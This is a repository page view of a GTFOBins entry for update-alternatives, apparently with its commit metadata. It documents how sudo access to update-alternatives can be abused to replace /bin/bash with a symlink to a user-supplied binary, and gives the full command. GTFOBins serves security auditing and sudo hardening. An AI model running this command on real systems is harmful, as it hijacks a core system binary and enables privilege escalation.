Files
GTFOBins.github.io/_gtfobins/update-alternatives.md
Michael Gisbers e212f23455 Create update-alternatives.md
Use update-alternatives with sudo to replace system binaries
2020-11-17 18:54:53 +01:00

250 B

functions
functions
sudo
description code
Replace existing binary with symlink pointing to user supplied binary cp file_to_replace_bash /tmp/bash sudo update-alternatives --force --install /bin/bash bash /tmp/bash 1